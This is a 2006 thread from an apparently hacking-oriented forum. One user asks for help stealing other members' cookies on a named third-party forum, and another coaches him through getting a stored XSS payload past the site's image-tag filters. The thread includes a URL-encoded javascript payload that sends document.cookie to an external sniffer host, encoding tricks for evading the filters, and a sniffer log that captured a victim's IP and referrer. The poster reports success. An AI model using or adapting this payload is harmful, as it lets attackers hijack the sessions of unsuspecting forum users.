cookie stealing HELP!!

Discussion in 'Forum for discussion of ANTICHAT' started by !!RapBoy!!, 2 Jul 2006.

  1. !!RapBoy!!

    !!RapBoy!! New Member

    Joined:
    12 May 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Hi There is a forum I want to steal user's cookie information,
    I tried some methods like
    Code:
    [img]j	a	v	a	s	c	r	i	p	t:alert(document.cookie).jpg[/img]

    I posted this and code alerted on the screen with cookie information but ı want this code to send my cookie logger because when it alert on the screen no use for me , is there a code send cookie to my logger :confused:
     
    #1 !!RapBoy!!, 2 Jul 2006
    Last edited: 31 Aug 2006
  2. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    If it's working, you can try somthing like this
    [​IMG]
    maybe, you'll need to change " to '
     
  3. !!RapBoy!!

    !!RapBoy!! New Member

    Joined:
    12 May 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0

    I already tried this code but Forum does not allow to post. it says IMG tags are not allowed to post .. :mad:
     
  4. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    try this
    [​IMG]
    it's the same, but URL encoded
     
  5. !!RapBoy!!

    !!RapBoy!! New Member

    Joined:
    12 May 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    I tried a lot of encoding methods but not succesful, Forum error says: THE FOLLOWING ERROR(S) WERE FOUND
    You are not allowed to use that image extension on this board. A valid format is: http://www.domain.com/picture.gif, an invalid format is: http://www.domain.com/picture.one.gif
    :( :( :(
     
  6. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Maybe, it should have .gif on the end
    [​IMG]
    or
    [​IMG]
    don't forget about %3B%2F/ is't ;//
     
  7. !!RapBoy!!

    !!RapBoy!! New Member

    Joined:
    12 May 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    I tried .gif in the end it is a good idea :rolleyes: and forum accepted it but I checked www.antichat.ru/sniff/log.php there is no cookie :( code bypassed but did not send any cookie to log.php :confused:
     
  8. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Not long time ago, someone public, a new online sniffer, but it's allmost in russian, if you understend some russian or you have translater, you can sing up on it.
    Sniffer

    There is the Post
     
    1 person likes this.
  9. !!RapBoy!!

    !!RapBoy!! New Member

    Joined:
    12 May 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    I have my own sniffer , İt is older version but perfect :eek:
    I have a question again :)

    I tried this code


    Code:
    [img]j	a	v	a	s	c	r	i	p	t:img%3Dnew%2F**%2FImage%28%29%3Bimg.src%3D%22http%3A%2F%2Fku-pa.com%2Fmines%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie.gif[/img]

    Cookie received by my sniffer like this:

    IP: xx.248.35.109
    COOKIE: undefined
    GÖNDEREN: http://support.gorsk.net/forum/index.php?showtopic=528&st=0&gopid=3181&#entry3181
    TARAYICI: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

    İt says ''undefined'' (cookie part):confused: :confused:
     
  10. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Of course, there's undefined property document.cookie.gif and I showed to you this document.cookie//image.gif . It's comment //.
    chenge this
    /**/ to %20
    + to %2B
    " to %27
    //.gif to %2F/img.gif

    P.S. What's wronrg in this site, why you wonna hack it?
     
  11. !!RapBoy!!

    !!RapBoy!! New Member

    Joined:
    12 May 2006
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    hidden thanx a lot for your helps, Iam just trying to make this xss work and made it :D I wont hack this website in any way ;)
     
    1 person likes this.